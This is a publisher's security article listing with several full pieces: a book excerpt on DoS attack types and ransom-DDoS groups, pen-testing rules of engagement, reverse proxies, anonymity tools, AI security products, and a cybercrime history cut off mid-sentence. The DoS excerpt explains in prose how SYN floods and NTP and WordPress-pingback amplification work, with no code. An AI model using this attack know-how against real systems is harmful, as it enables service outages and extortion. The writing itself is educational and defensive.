Search icon CANCEL
Arrow left icon
Explore Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Conferences
Free Learning
Arrow right icon

Tech Guides - Security

59 Articles
article-image-10-types-dos-attacks-you-need-to-know
Savia Lobo
05 Jun 2018
11 min read
Save for later

The 10 most common types of DoS attacks you need to know

Savia Lobo
05 Jun 2018
11 min read
There are businesses that are highly dependent on their services hosted online. It's important that their servers are up and running smoothly during their business hours. Stock markets and casinos are examples of such institutions. They are businesses that deal with a huge sum of money and they expect their servers to work properly during their core business hours. Hackers may extort money by threatening to take down or block these servers during these hours. Denial of service (DoS) attack is the most common methodology used to carry out these kinds of attacks. In this post, we will get to know about  DoS attacks and their various types. This article is an excerpt taken from the book, 'Preventing Ransomware' written by Abhijit Mohanta, Mounir Hahad, and Kumaraguru Velmurugan. In this book, you will learn how to respond quickly to ransomware attacks to protect yourself. What are DoS attacks? DoS is one of the oldest forms of cyber extortion attack. As the term indicates, distributed denial of service (DDoS) means it denies its service to a legitimate user. If a railway website is brought down, it fails to serve the people who want to book tickets. Let's take a peek into some of the details. A DoS attack can happen in two ways: Specially crafted data: If specially crafted data is sent to the victim and if the victim is not set up to handle the data, there are chances that the victim may crash. This does not involve sending too much data but includes specially crafted data packets that the victim fails to handle. This can involve manipulating fields in the network protocol packets, exploiting servers, and so on. Ping of death and teardrop attacks are examples of such attacks. Flooding: Sending too much data to the victim can also slow it down. So it will spend resources on consuming the attackers' data and fail to serve the legitimate data. This can be a DDoS attack where packets are sent to the victim by the attacker from many computers. Attacks can also use a combination of both. For example, UDP flooding and SYN flooding are examples of such attacks. There is another form of DoS attack called a DDoS attack. A DoS attack uses a single computer to carry out the attack. A DDoS attack uses a series of computers to carry out the attack. Sometimes the target server is flooded with so much data that it can't handle it. Another way is to exploit the workings of internal protocols. A DDoS attack that deals with extortion is often termed a ransom DDoS. We will now talk about various types of the DoS attacks that might occur. Teardrop attacks or IP fragmentation attacks In this type of attack, the hacker sends a specially crafted packet to the victim. To understand this, one must have knowledge of the TCP/IP protocol. In order to transmit data across networks, IP packets are broken down into smaller packets. This is called fragmentation. When the packets finally reach their destination, they are re-assembled together to get the original data. In the process of fragmentation, some fields are added to the fragmented packets so that they can be tracked at the destination while reassembling. In a teardrop attack, the attacker crafts some packets that overlap with each other. Consequently, the operating system at the destination gets confused about how to reassemble the packets and hence it crashes. User Datagram Protocol flooding User Datagram Protocol (UDP) is an unreliable packet. This means the sender of the data does not care if the receiver has received it. In UDP flooding, many UDP packets are sent to the victim at random ports. When the victim gets a packet on a port, it looks out for an application that is listening to that port. When it does not find the packet, it replies back with an Internet Control Message Protocol (ICMP) packet. ICMP packets are used to send error messages. When a lot of UDP packets are received, the victim consumes a lot of resources in replying back with ICMP packets. This can prevent the victim from responding to legitimate requests. SYN flood TCP is a reliable connection. That means it makes sure that the data sent by the sender is completely received by the receiver. To start a communication between the sender and receiver, TCP follows a three-way handshake. SYN denotes the synchronization packet and ACK stands for acknowledgment: The sender starts by sending a SYN packet and the receiver replies with SYN-ACK. The sender sends back an ACK packet followed by the data. In SYN flooding, the sender is the attacker and the receiver is the victim. The attacker sends a SYN packet and the server responds with SYN-ACK. But the attacker does not reply with an ACK packet. The server expects an ACK packet from the attacker and waits for some time. The attacker sends a lot of SYN packets and the server waits for the final ACK until timeout. Hence, the server exhausts its resources waiting for ACK. This kind of attack is called SYN flooding. Ping of death While transmitting data over the internet, the data is broken into smaller chunks of packets. The receiving end reassembles these broken packets together in order to derive a conclusive meaning. In a ping of death attack, the attacker sends a packet larger than 65,536 bytes, the maximum size of a packet allowed by the IP protocol. The packets are split and sent across the internet. But when the packets are reassembled at the receiving end, the operating system is clueless about how to handle these bigger packets, so it crashes. Exploits Exploits for servers can also cause DDoS vulnerability. A lot of web applications are hosted on web servers, such as Apache and Tomcat. If there is a vulnerability in these web servers, the attacker can launch an exploit against the vulnerability. The exploit need not necessarily take control, but it can crash the web server software. This can cause a DoS attack. There are easy ways for hackers to find out the web server and its version if the server has default configurations. The attacker finds out the possible vulnerabilities and exploits for that web server. If the web server is not patched, the attacker can bring it down by sending an exploit. Botnets Botnets can be used to carry out DDoS attacks. A botnet herd is a collection of compromised computers. The compromised computers, called bots, act on commands from a C&C server. These bots, on the commands of the C&C server, can send a huge amount of data to the victim server, and as a result, the victim server is overloaded: Reflective DDoS attacks and amplification attacks In this kind of attack, the attacker uses a legitimate computer to launch an attack against the victim by hiding its own IP address. The usual way is the attacker sends a small packet to a legitimate machine after forging the sender of the packet to look as if it has been sent from the victim. The legitimate machine will, in turn, send the response to the victim. If the response data is large, the impact is amplified. We can call the legitimate computers reflectors and this kind of attack, where the attacker sends small data and the victim receives a larger amount of data, is called an amplification attack. Since the attacker does not directly use computers controlled by him and instead uses legitimate computers, it's called a reflective DDoS attack: The reflectors are not compromised machines, unlike botnets. Reflectors are machines that respond to a particular request. It can be a DNS request or a Networking Time Protocol (NTP) request, and so on. DNS amplification attacks, WordPress pingback attacks, and NTP attacks are amplification attacks. In a DNS amplification attack, the attacker sends a forged packet to the DNS server containing the IP address of the victim. The DNS server replies back to the victim instead with larger data. Other kinds of amplification attack include SMTP, SSDP, and so on. We will look at an example of such an attack in the next section. The computers that are used to send traffic to the victim are not the compromised ones and are called reflectors. There are several groups of cyber criminals responsible for carrying out ransom DDoS attacks, such as DD4BC, Armada Collective, Fancy Bear, XMR-Squad, and Lizard Squad. These groups target enterprises. They will first send out an extortion email, followed by an attack if the victim does not pay the ransom. DD4BC The DD4BC group was seen operating in 2014. It charged Bitcoins as the extortion fee. The group mainly targeted media, entertainment, and financial services. They would send a threatening email stating that a low-intensity DoS attack will be carried out first. They would claim that they will protect the organization against larger attacks. They also threatened that they will publish information about the attack in social media to bring down the reputation of the company: Usually, DD4DC are known to exploit a bug WordPress pingback vulnerability. We don't want to get into too much detail about this bug or vulnerability. Pingback is a feature provided by WordPress through which the original author of the WordPress site or blog gets notified where his site has been linked or referenced. We can call the site which refers to the original site as the referrer and the original site as the original. If the referrer uses the original, it sends a request called a pingback request to the original which contains the URL of itself. This is a kind of notification to the original site from the referrer informing that it is linking to the original site. Now the original site downloads the referrer site as a response to the pingback request as per the protocol designed by WordPress and this action is termed as a reflection. The WordPress sites used in the attack are called reflectors. So an attacker can misuse it by creating a forged pingback request with a URL of a victim site and send it to the WordPress sites. The attack uses these WordPress sites in the attack. As a result, the WordPress sites respond to the victim. Put simply, the attack notifies the WordPress sites that the victim has referred them on his/her site. So all the WordPress sites try to connect to the victim, which overloads the victim. If the victim's web page is large and the WordPress sites try to download it, then it chokes the bandwidth and this is called amplification: Armada Collective The Armada Collective group was first seen in 2015. They attacked various financial services and web hosting sites in Russia, Switzerland, Greece, and Thailand. They again re-emerged in Central Europe in October 2017. They used to carry out a demo-DDoS attack to threaten the victim. Here is an extortion letter from Armada Collective: This group is known to carry out reflective DDoS attacks through NTP. The NTP protocol is a protocol that is used to synchronize computer clock times in a protocol. The NTP protocol provides a support for a monlist command for administrative purpose. When an administrator sends the monlist command to an NTP server, the server responds with a list of 600 hosts that are connected to that NTP server. The attacker can exploit this by creating a forged NTP packet which has a monlist command containing the IP address of the victim and then sending multiple copies to the NTP server. The NTP server thinks that the monlist request has come from the victim address and sends a response which contains a list of 600 computers connected to that server. Thus the victim receives too much data from the NTP response and it can crash: Fancy Bear Fancy Bear is one of the hacker groups we have known about since 2010. Fancy Bear threatened to use Mirai Botnet in the attack. Mirai Botnet was known to target Linux operating systems used in IoT devices. It was mostly known to infect CCTV cameras. Here is a letter from Fancy Bear: We have talked about a few groups that were infamous for carrying out DoS extortion and some of the techniques used by them. We explored different types of DoS attacks and how they can occur. If you've enjoyed this excerpt, check out 'Preventing Ransomware' to know in detail about the latest ransomware attacks involving WannaCry, Petya, and BadRabbit. Anatomy of a Crypto Ransomware Barracuda announces Cloud-Delivered Web Application Firewall service Top 5 penetration testing tools for ethical hackers
Read more
  • 0
  • 0
  • 52436

article-image-penetration-testing-rules-of-engagement
Fatema Patrawala
14 May 2018
7 min read
Save for later

5 pen testing rules of engagement: What to consider while performing Penetration testing

Fatema Patrawala
14 May 2018
7 min read
Penetration testing and ethical hacking are proactive ways of testing web applications by performing attacks that are similar to a real attack that could occur on any given day. They are executed in a controlled way with the objective of finding as many security flaws as possible and to provide feedback on how to mitigate the risks posed by such flaws. Security-conscious corporations have implemented integrated penetration testing, vulnerability assessments, and source code reviews in their software development cycle. Thus, when they release a new application, it has already been through various stages of testing and remediation. When planning to execute a penetration testing project, be it for a client as a professional penetration tester or as part of a company's internal security team, there are aspects that always need to be considered before starting the engagement. [box type="shadow" align="" class="" width=""]This article is an excerpt from the book Web Penetration testing with Kali Linux - Third Edition, written by Gilberto Najera-Gutierrez, Juned Ahmed Ansari.[/box] Rules of Engagement for Pen testing Rules of Engagement (RoE) is a document that deals with the manner in which the penetration test is to be conducted. Some of the directives that should be clearly spelled out in RoE before you start the penetration test are as follows: The type and scope of testing Client contact details Client IT team notifications Sensitive data handling Status meeting and reports Type and scope of Penetration testing The type of testing can be black box, white box, or an intermediate gray box, depending on how the engagement is performed and the amount of information shared with the testing team. There are things that can and cannot be done in each type of testing. With black box testing, the testing team works from the view of an attacker who is external to the organization, as the penetration tester starts from scratch and tries to identify the network map, the defense mechanisms implemented, the internet-facing websites and services, and so on. Even though this approach may be more realistic in simulating an external attacker, you need to consider that such information may be easily gathered from public sources or that the attacker may be a disgruntled employee or ex-employee who already possess it. Thus, it may be a waste of time and money to take a black box approach if, for example, the target is an internal application meant to be used by employees only. White box testing is where the testing team is provided with all of the available information about the targets, sometimes even including the source code of the applications, so that little or no time is spent on reconnaissance and scanning. A gray box test then would be when partial information, such as URLs of applications, user-level documentation, and/or user accounts are provided to the testing team. Gray box testing is especially useful when testing web applications, as the main objective is to find vulnerabilities within the application itself, not in the hosting server or network. Penetration testers can work with user accounts to adopt the point of view of a malicious user or an attacker that gained access through social engineering. [box type="note" align="" class="" width=""]When deciding on the scope of testing, the client along with the testing team need to evaluate what information is valuable and necessary to be protected, and based on that, determine which applications/networks need to be tested and with what degree of access to the information.[/box] Client contact details We can agree that even when we take all of the necessary precautions when conducting tests, at times the testing can go wrong because it involves making computers do nasty stuff. Having the right contact information on the client-side really helps. A penetration test is often seen turning into a Denial-of-Service (DoS) attack. The technical team on the client side should be available 24/7 in case a computer goes down and a hard reset is needed to bring it back online. [box type="note" align="" class="" width=""]Penetration testing web applications has the advantage that it can be done in an environment that has been specially built for that purpose, allowing the testers to reduce the risk of negatively affecting the client's productive assets.[/box] Client IT team notifications Penetration tests are also used as a means to check the readiness of the support staff in responding to incidents and intrusion attempts. You should discuss this with the client whether it is an announced or unannounced test. If it's an announced test, make sure that you inform the client of the time and date, as well as the source IP addresses from where the testing (attack) will be done, in order to avoid any real intrusion attempts being missed by their IT security team. If it's an unannounced test, discuss with the client what will happen if the test is blocked by an automated system or network administrator. Does the test end there, or do you continue testing? It all depends on the aim of the test, whether it's conducted to test the security of the infrastructure or to check the response of the network security and incident handling team. Even if you are conducting an unannounced test, make sure that someone in the escalation matrix knows about the time and date of the test. Web application penetration tests are usually announced. Sensitive data handling During test preparation and execution, the testing team will be provided with and may also find sensitive information about the company, the system, and/or its users. Sensitive data handling needs special attention in the RoE and proper storage and communication measures should be taken (for example, full disk encryption on the testers' computers, encrypting reports if they are sent by email, and so on). If your client is covered under the various regulatory laws such as the Health Insurance Portability and Accountability Act (HIPAA), the Gramm-Leach-Bliley Act (GLBA), or the European data privacy laws, only authorized personnel should be able to view personal user data. Status meeting and reports Communication is key for a successful penetration test. Regular meetings should be scheduled between the testing team and the client organization and routine status reports issued by the testing team. The testing team should present how far they have reached and what vulnerabilities have been found up to that point. The client organization should also confirm whether their detection systems have triggered any alerts resulting from the penetration attempt. If a web server is being tested and a WAF was deployed, it should have logged and blocked attack attempts. As a best practice, the testing team should also document the time when the test was conducted. This will help the security team in correlating the logs with the penetration tests. [box type="note" align="" class="" width=""]WAFs work by analyzing the HTTP/HTTPS traffic between clients and servers, and they are capable of detecting and blocking the most common attacks on web applications.[/box] To build defense against web attacks with Kali Linux and understand the concepts of hacking and penetration testing, check out this book Web Penetration Testing with Kali Linux - Third Edition. Top 5 penetration testing tools for ethical hackers Essential skills required for penetration testing Approaching a Penetration Test Using Metasploit
Read more
  • 0
  • 2
  • 47588

article-image-6-common-use-cases-of-reverse-proxy-scenarios
Guest Contributor
05 Oct 2018
6 min read
Save for later

6 common use cases of Reverse Proxy scenarios

Guest Contributor
05 Oct 2018
6 min read
Proxy servers are used as intermediaries between a client and a website or online service. By routing traffic through a proxy server, users can disguise their geographic location and their IP address. Reverse proxies, in particular, can be configured to provide a greater level of control and abstraction, thereby ensuring the flow of traffic between clients and servers remains smooth. This makes them a popular tool for individuals who want to stay hidden online, but they are also widely used in enterprise settings, where they can improve security, allow tasks to be carried out anonymously, and control the way employees are able to use the internet. What is a Reverse Proxy? A reverse proxy server is a type of proxy server that usually exists behind the firewall of a private network. It directs any client requests to the appropriate server on the backend. Reverse proxies are also used as a means of caching common content and compressing inbound and outbound data, resulting in a faster and smoother flow of traffic between clients and servers. Furthermore, the reverse proxy can handle other tasks, such as SSL encryption, further reducing the load on web servers. There is a multitude of scenarios and use cases in which having a reverse proxy can make all the difference to the speed and security of your corporate network. By providing you with a point at which you can inspect traffic and route it to the appropriate server, or even transform the request, a reverse proxy can be used to achieve a variety of different goals. Load Balancing to route incoming HTTP requests This is probably the most familiar use of reverse proxies for many users. Load balancing involves the proxy server being configured to route incoming HTTP requests to a set of identical servers. By spreading incoming requests across these servers, the reverse proxies are able to balance out the load, therefore sharing it amongst them equally. The most common scenario in which load balancing is employed is when you have a website that requires multiple servers. This happens due to the volume of requests, which are too much for one server to handle efficiently. By balancing the load across multiple servers, you can also move away from an architecture that features a single point of failure. Usually, the servers will all be hosting the same content, but there are also situations in which the reverse proxy will also be retrieving specific information from one of a number of different servers. Provide security by monitoring and logging traffic By acting as the mediator between clients and your system’s backend, a reverse proxy server can hide the overall structure of your backend servers. This is because the reverse proxy will capture any requests that would otherwise go to those servers and handle them securely. A reverse proxy can also improve security by providing businesses with a point at which they can monitor and log traffic flowing through their network. A common use case in which a reverse proxy is used to bolster the security of a network would be the use of a reverse proxy as an SSL gateway. This allows you to communicate using HTTP behind the firewall without compromising your security. It also saves you the trouble of having to configure security for each server behind the firewall individually. A rotating residential proxy, also known as a backconnect proxy, is a type of proxy that frequently changes the IP addresses and connections that the user uses. This allows users to hide their identity and generate a large number of requests without setting alarms off. A reverse rotating residential proxy can be used to improve the security of a corporate network or website. This is because the servers in question will display the information for the proxy server while keeping their own information hidden from potential attackers. No need to install certificates on your backend servers with SSL Termination SSL termination process occurs when an SSL connection server ends, or when the traffic shifts between encrypted and unencrypted requests. By using a reverse proxy to handle any incoming HTTPS connections, you can have the proxy server decrypt the request, and then pass on the unencrypted request to the appropriate server. Taking this approach offers practical benefits. For example, it eliminates the need to install certificates on your backend servers. It also provides you with a single configuration point for managing SSL/TLS. Removing the need for your web servers to undertake this decryption means that you are also reducing the processing load on the server. Serve static content on behalf of backend servers Some reverse proxy servers can be configured to also act as web servers. Websites contain a mixture of dynamic content, which changes over time, and static content, which always remains the same. If you can configure your reverse proxy server to serve up static content on behalf of backend servers, you can greatly reduce the load, freeing up more power for dynamic content rendering. Alternatively, a reverse proxy can be configured to behave like a cache. This allows it to store and serve content that is frequently requested, thereby further reducing the load on backend servers. URL Rewriting before they go on to the backend servers Anything that a business can do to easily to improve their SEO score is worth considering. Without an investment in your SEO, your business or website will remain invisible to search engine users. With URL rewriting, you can compensate for any legacy systems you use, which produce URLs that are less than ideal for SEO. With a reverse proxy server, the URLs can be automatically reformatted before they are passed on to the backend servers. Combine Different Websites into a Single URL Space It is often desirable for a business to adopt a distributed architecture whereby different functions are handled by different components. With a reverse proxy, it is easy to route a single URL to a multitude of components. To anyone who uses your URL, it will simply appear as if they are moving to another page on the website. In fact, each page within that URL might actually be connecting to a completely different backend service. This is an approach that is widely used for web service APIs. To sum up, the primary function of a reverse proxy is load balancing, ensuring that no individual backend server becomes inundated with more traffic or requests than it can handle. However, there are a number of other scenarios in which a reverse proxy can potentially offer enormous benefits. About the author Harold Kilpatrick is a cybersecurity consultant and a freelance blogger. He's currently working on a cybersecurity campaign to raise awareness around the threats that businesses can face online. Read Next HAProxy introduces stick tables for server persistence, threat detection, and collecting metrics How to Configure Squid Proxy Server Acting as a proxy (HttpProxyModule)
Read more
  • 0
  • 0
  • 26774

article-image-tools-to-stay-completely-anonymous-online
Guest Contributor
12 Jul 2018
8 min read
Save for later

10 great tools to stay completely anonymous online

Guest Contributor
12 Jul 2018
8 min read
Everybody is facing a battle these days. Though it may not be immediately apparent, it is already affecting a majority of the global population. This battle is not fought with bombs, planes, or tanks or with any physical weapons for that matter. This battle is for our online privacy. A survey made last year discovered 69% of data breaches were related to identity theft. Another survey shows the number of cases of data breaches related to identity theft has steadily risen over the last 4 years worldwide. And it is likely to increase as hackers are gaining easy access more advanced tools. The EU’s GDPR may curb this trend by imposing stricter data protection standards on data controllers and processors. These entities have been collecting and storing our data for years through ads that track our online habits-- another reason to protect our online anonymity. However, this new regulation has only been in force for over a month and only within the EU. So, it's going to take some time before we feel its long-term effects. The question is, what should we do when hackers out there try to steal and maliciously use our personal information? Simple: We defend ourselves with tools at our disposal to keep ourselves completely anonymous online. So, here’s a list you may find useful. 1. VPNs A VPN helps you maintain anonymity by hiding your real IP and internet activity from prying eyes. Normally, your browser sends a query tagged with your IP every time you make an online search. Your ISP takes this query and sends it to a DNS server which then points you to the correct website. Of course, your ISP (and all the servers your query had to go through) can, and will likely, view and monitor all the data you course through them-- including your personal information and IP address. This allows them to keep a tab on all your internet activity. A VPN protects your identity by assigning you an anonymous IP and encrypting your data. This means that any query you send to your ISP will be encrypted and no longer display your real IP. This is why using a VPN is one of the best ways to keeping anonymous online. However, not all VPNs are created equal. You have to choose the best one if you want airtight security. Also, beware of free VPNs. Most of them make money by selling your data to advertisers. You’ll want to compare and contrast several VPNs to find the best one for you. But, that’s sooner said than done with so many different VPNs out there. Look for reviews on trustworthy sites to find the best vpn for your needs. 2. TOR Browser The Onion Router (TOR) is a browser that strengthens your online anonymity even more by using different layers of encryption-- thereby protecting your internet activity which includes “visits to Web sites, online posts, instant messages, and other communication forms”. It works by first encasing your data in three layers of encryption. Your data is then bounced three times-- each bounce taking off one layer of encryption. Once your data gets to the right server, it “puts back on” each layer it has shed as it successively bounces back to your device. You can even improve TOR by using it in combination with a compatible VPN. It is important to note, though, that using TOR won’t hide the fact that you’re using it. Some sites may restrict allowances made through TOR. 3. Virtual machine A Virtual machine is basically a second computer within your computer. It lets you emulate another device through an application. This emulated computer can then be set according to your preferences. The best use for this tool, however, is for tasks that don’t involve an internet connection. It is best used for when you want to open a file and want to make sure no one is watching over your shoulder. After opening the file, you then simply delete the virtual machine. You can try VirtualBox which is available on Windows, Linux, and Mac. 4. Proxy servers A proxy server is an intermediary between your device and the internet. It’s basically another computer that you use to process internet requests. It’s similar to a virtual machine in concept but it’s an entirely separate physical machine. It protects your anonymity in a similar way a VPN does (by hiding your IP) but it can also send a different user agent to keep your browser unidentifiable and block or accept cookies but keep them from passing to your device. Most VPN companies also offer proxy servers so they’re a good place to look for a reliable one. 5. Fake emails A fake email is exactly what the name suggests: an email that isn’t linked to your real identity. Fake emails aid your online anonymity by not only hiding your real identity but by making sure to keep you safe from phishing emails or malware-- which can be easily sent to you via email. Making a fake email can be as easy as signing up for an email without using your real information or by using a fake email service. 6. Incognito mode “Going incognito” is the easiest anonymity tool to come by. Your device will not store any data at all while in this mode including: your browsing history, cookies, site data, and information entered in forms. Most browsers have a privacy mode that you can easily use to hide your online activity from other users of the same device. 7. Ad blockers Ads are everywhere these days. Advertising has and always will be a lucrative business. That said, there is a difference between good ads and bad ads. Good ads are those that target a population as a whole. Bad ads (interest-based advertising, as their companies like to call it) target each of us individually by tracking our online activity and location-- which compromises our online privacy. Tracking algorithms aren’t illegal, though, and have even been considered “clever”. But, the worst ads are those that contain malware that can infect your device and prevent you from using it. You can use ad blockers to combat these threats to your anonymity and security. Ad blockers usually come in the form of browser extensions which instantly work with no additional configuration needed. For Google Chrome, you can choose either Adblock Plus, uBlock Origin, or AdBlock. For Opera, you can choose either Opera Ad Blocker, Adblock Plus, or uBlock Origin. 8. Secure messaging apps If you need to use an online messaging app, you should know that the popular ones aren’t as secure as you’d like them to be. True, Facebook messenger does have a “secret conversation” feature but Facebook hasn’t exactly been the most secure social network to begin with. Instead, use tools like Signal or Telegram. These apps use end-to-end encryption and can even be used to make voice calls. 9. File shredder The right to be forgotten has surfaced in mainstream media with the onset of the EU’s General Data Protection Regulation. This right basically requires data collecting or processing entities to completely remove a data subject’s PII from their records. You can practice this same right on your own device by using a “file shredding” tool. But the the thing is: Completely removing sensitive files from your device is hard. Simply deleting it and emptying your device’s recycle bin doesn’t actually remove the file-- your device just treats the space it filled up as empty and available space. These “dead” files can still haunt you when they are found by someone who knows where to look. You can use software like Dr. Cleaner (for Mac) or Eraser (for Win) to “shred” your sensitive files by overwriting them several times with random patterns of random sets of data. 10. DuckDuckGo DuckDuckGo is a search engine that doesn’t track your behaviour (like Google and Bing that use behavioural trackers to target you with ads). It emphasizes your privacy and avoids the filter bubble of personalized search results. It offers useful features like region-specific searching, Safe Search (to protect against explicit content), and an instant answer feature which shows an answer across the top of the screen apart from the search results. To sum it up: Our online privacy is being attacked from all sides. Ads legally track our online activities and hackers steal our personal information. The GDPR may help in the long run but that remains to be seen. What's important is what we do now. These tools will set you on the path to a more secure and private internet experience today. About the Author Dana Jackson, an U.S. expat living in Germany and the founder of PrivacyHub. She loves all things related to security and privacy. She holds a degree in Political Science, and loves to call herself a scientist. Dana also loves morning coffee and her dog Paw.   [divider style="normal" top="20" bottom="20"] Top 5 cybersecurity trends you should be aware of in 2018 Twitter allegedly deleted 70 million fake accounts in an attempt to curb fake news Top 5 cybersecurity myths debunked  
Read more
  • 0
  • 4
  • 22215

article-image-6-artificial-intelligence-cybersecurity-tools-you-need-to-know
Savia Lobo
25 Aug 2018
7 min read
Save for later

6 artificial intelligence cybersecurity tools you need to know

Savia Lobo
25 Aug 2018
7 min read
Recently, most of the organizations experienced severe downfall due to an undetected malware, Deeplocker, which secretly evaded even the stringent cyber security mechanisms. Deeplocker leverages the AI model to attack the target host by using indicators such as facial recognition, geolocation and voice recognition. This incidence speaks volumes about the big role AI plays in the cybersecurity domain. In fact, some may even go on to say that AI for cybersecurity is no longer a nice to have tech rather a necessity. Large and small organizations and even startups are hugely investing in building AI systems to analyze the huge data trove and in turn, help their cybersecurity professionals to identify possible threats and take precautions or immediate actions to solve it. If AI can be used in getting the systems protected, it can also harm it. How? The hackers and intruders can also use it to launch an attack--this would be a much smarter attack--which would be difficult to combat. Phishing, one of the most common and simple social engineering cyber attack is now easy for attackers to master. There are a plethora of tools on the dark web that can help anyone to get their hands on phishing. In such trying conditions, it is only imperative that organizations take necessary precautions to guard their information castles. What better than AI? How 6 tools are using artificial intelligence for cybersecurity Symantec’s Targeted attack analytics (TAA) tool This tool was developed by Symantec and is used to uncover stealthy and targeted attacks. It applies AI and machine learning on the processes, knowledge, and capabilities of the Symantec’s security experts and researchers. The TAA tool was used by Symantec to counter the Dragonfly 2.0 attack last year. This attack targeted multiple energy companies and tried to gain access to operational networks. Eric Chein, Technical Director of Symantec Security says, “ With TAA, we’re taking the intelligence generated from our leading research teams and uniting it with the power of advanced machine learning to help customers automatically identify these dangerous threats and take action.” The TAA tools analyze incidents within the network against the incidents found in their Symantec threat data lake. TAA unveils suspicious activity in individual endpoints and collates that information to determine whether each action indicate hidden malicious activity. The TAA tools are now available for Symantec Advanced Threat Protection (ATP) customers. Sophos’ Intercept X tool Sophos is a British security software and hardware company. Its tool, Intercept X, uses a deep learning neural network that works similar to a human brain. In 2010, the US Defense Advanced Research Projects Agency (DARPA) created their first Cyber Genome Program to uncover the ‘DNA’ of malware and other cyber threats, which led to the creation of algorithm present in the Intercept X. Before a file executes, the Intercept X is able to extract millions of features from a file, conduct a deep analysis, and determine if a file is benign or malicious in 20 milliseconds. The model is trained on real-world feedback and bi-directional sharing of threat intelligence via an access to millions of samples provided by the data scientists. This results in high accuracy rate for both existing and zero-day malware, and a lower false positive rate. Intercept X utilizes behavioral analysis to restrict new ransomware and boot-record attacks.  The Intercept X has been tested on several third parties such as NSS labs and received high-scores. It is also proven on VirusTotal since August of 2016. Maik Morgenstern, CTO, AV-TEST said, “One of the best performance scores we have ever seen in our tests.” Darktrace Antigena Darktrace Antigena is Darktrace’s active self-defense product. Antigena expands Darktrace’s core capabilities to detect and replicate the function of digital antibodies that identify and neutralize threats and viruses. Antigena makes use of Darktrace’s Enterprise Immune System to identify suspicious activity and responds to them in real-time, depending on the severity of the threat. With the help of underlying machine learning technology, Darktrace Antigena identifies and protects against unknown threats as they develop. It does this without the need for human intervention, prior knowledge of attacks, rules or signatures. With such automated response capability, organizations can respond to threats quickly, without disrupting the normal pattern of business activity. Darktrace Antigena modules help to regulate user and machine access to the internet, message protocols and machine and network connectivity via various products such as Antigena Internet, Antigena Communication, and Antigena network. IBM QRadar Advisor IBM’s QRadar Advisor uses the IBM Watson technology to fight against cyber attacks. It uses AI to auto-investigate indicators of any compromise or exploit. QRadar Advisor uses cognitive reasoning to give critical insights and further accelerates the response cycle. With the help of IBM’s QRadar Advisor, security analysts can assess threat incidents and reduce the risk of missing them. Features of the IBM QRadar Advisor Automatic investigations of incidents QRadar Advisor with Watson investigates threat incidents by mining local data using observables in the incident to gather broader local context. It later quickly assesses the threats regarding whether they have bypassed layered defenses or were blocked. Provides Intelligent reasoning QRadar identifies the likely threat by applying cognitive reasoning. It connects threat entities related to the original incident such as malicious files, suspicious IP addresses, and rogue entities to draw relationships among these entities. Identifies high priority risks With this tool, one can get critical insights on an incident, such as whether or not a malware has executed, with supporting evidence to focus your time on the higher risk threats. Then make a decision quickly on the best response method for your business. Key insights on users and critical assets IBM’s QRadar can detect suspicious behavior from insiders through integration with the User Behavior Analytics (UBA) App and understands how certain activities or profiles impact systems. Vectra’s Cognito Vectra’s Cognito platform uses AI to detect attackers in real-time. It automates threat detection and hunts for covert attackers. Cognito uses behavioral detection algorithms to collect network metadata, logs and cloud events. It further analyzes these events and stores them to reveal hidden attackers in workloads and user/IoT devices. Cognito platform consists of Cognito Detect and Cognito Recall. Cognito Detect reveals hidden attackers in real time using machine learning, data science, and behavioral analytics. It automatically triggers responses from existing security enforcement points by driving dynamic incident response rules. Cognito Recall determines exploits that exist in historical data. It further speeds up detection of incident investigations with actionable context about compromised devices and workloads over time. It’s a quick and easy fix to find all devices or workloads accessed by compromised accounts and identify files involved in exfiltration. Just as diamond cuts diamond, AI cuts AI. By using AI to attack and to prevent on either side, AI systems will learn different and newer patterns and also identify unique deviations to security analysts. This provides organizations to resolve an attack on the way much before it reaches to the core. Given the rate at which AI and machine learning are expanding, the days when AI will redefine the entire cybersecurity ecosystem are not that far. DeepMind AI can spot over 50 sight-threatening eye diseases with expert accuracy IBM’s DeepLocker: The Artificial Intelligence powered sneaky new breed of Malware 7 Black Hat USA 2018 conference cybersecurity training highlights Top 5 cybersecurity trends you should be aware of in 2018  
Read more
  • 0
  • 0
  • 16631

article-image-the-evolution-cybercrime
Packt Editorial Staff
29 Mar 2018
4 min read
Save for later

The evolution of cybercrime

Packt Editorial Staff
29 Mar 2018
4 min read
A history of cybercrime As computer systems have now become integral to the daily functioning of businesses, organizations, governments, and individuals we have learned to put a tremendous amount of trust in these systems. As a result, we have placed incredibly important and valuable information on them. History has shown, that things of value will always be a target for a criminal. Cybercrime is no different. As people flood their personal computers, phones, and so on with valuable data, they put a target on that information for the criminal to aim for, in order to gain some form of profit from the activity. In the past, in order for a criminal to gain access to an individual's valuables, they would have to conduct a robbery in some shape or form. In the case of data theft, the criminal would need to break into a building, sifting through files looking for the information of greatest value and profit. In our modern world, the criminal can attack their victims from a distance, and due to the nature of the internet, these acts would most likely never meet retribution. Cybercrime in the 70s and 80s In the 70s, we saw criminals taking advantage of the tone system used on phone networks. The attack was called phreaking, where the attacker reverse-engineered the tones used by the telephone companies to make long distance calls. In 1988, the first computer worm made its debut on the internet and caused a great deal of destruction to organizations. This first worm was called the Morris worm, after its creator Robert Morris. While this worm was not originally intended to be malicious it still caused a great deal of damage. The U.S. Government Accountability Office in 1980 estimated that the damage could have been as high as $10,000,000.00. 1989 brought us the first known ransomware attack, which targeted the healthcare industry. Ransomware is a type of malicious software that locks a user's data, until a small ransom is paid, which will result in the issuance of a cryptographic unlock key. In this attack, an evolutionary biologist named Joseph Popp distributed 20,000 floppy disks across 90 countries, and claimed the disk contained software that could be used to analyze an individual's risk factors for contracting the AIDS virus. The disk however contained a malware program that when executed, displayed a message requiring the user to pay for a software license. Ransomware attacks have evolved greatly over the years with the healthcare field still being a very large target. The birth of the web and a new dawn for cybercrime The 90s brought the web browser and email to the masses, which meant new tools for cybercriminals to exploit. This allowed the cybercriminal to greatly expand their reach. Up till this time, the cybercriminal needed to initiate a physical transaction, such as providing a floppy disk. Now cybercriminals could transmit virus code over the internet in these new, highly vulnerable web browsers. Cybercriminals took what they had learned previously and modified it to operate over the internet, with devastating results. Cybercriminals were also able to reach out and con people from a distance with phishing attacks. No longer was it necessary to engage with individuals directly. You could attempt to trick millions of users simultaneously. Even if only a small percentage of people took the bait you stood to make a lot of money as a cybercriminal. The 2000s brought us social media and saw the rise of identity theft. A bullseye was painted for cybercriminals with the creation of databases containing millions of users' personal identifiable information (PII), making identity theft the new financial piggy bank for criminal organizations around the world. This information coupled with a lack of cybersecurity awareness from the general public allowed cybercriminals to commit all 